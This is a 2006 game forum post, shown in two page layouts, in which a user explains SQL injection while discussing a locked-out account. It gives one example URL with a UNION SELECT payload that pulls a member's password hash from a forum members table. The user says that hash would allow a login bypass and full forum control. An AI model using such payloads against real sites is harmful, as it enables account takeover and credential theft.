Planetarion Forums - View Single Post

Androme · 12 Jun 2006, 11:18

If I was to make use of an SQL Injection it means I can insert/execute commands directly into the database - for example in a url I could do

Code:

pirate.pa.forum/index.php?par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=1

It's powerful enough that I can bypass the actual login process based on a hash and its associated memberid - and thus, gain complete access to a forum.

12 Jun 2006, 11:18	#89
Androme ☆ ♥ Join Date: Jan 2003 Posts: 3,489	Re: Account on Planetarion Forums locked out If I was to make use of an SQL Injection it means I can insert/execute commands directly into the database - for example in a url I could do Code: pirate.pa.forum/index.php?par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=1 It's powerful enough that I can bypass the actual login process based on a hash and its associated memberid - and thus, gain complete access to a forum. __________________ R3: LegioN (came #32) \|\| R4: BlueTuba R5: WolfPack Order \|\| R6: Wolfpack R7: Fury ----------retired------- R52-R55: Apprime R56-R57: FaceLess R58-60: Apprime/Ultores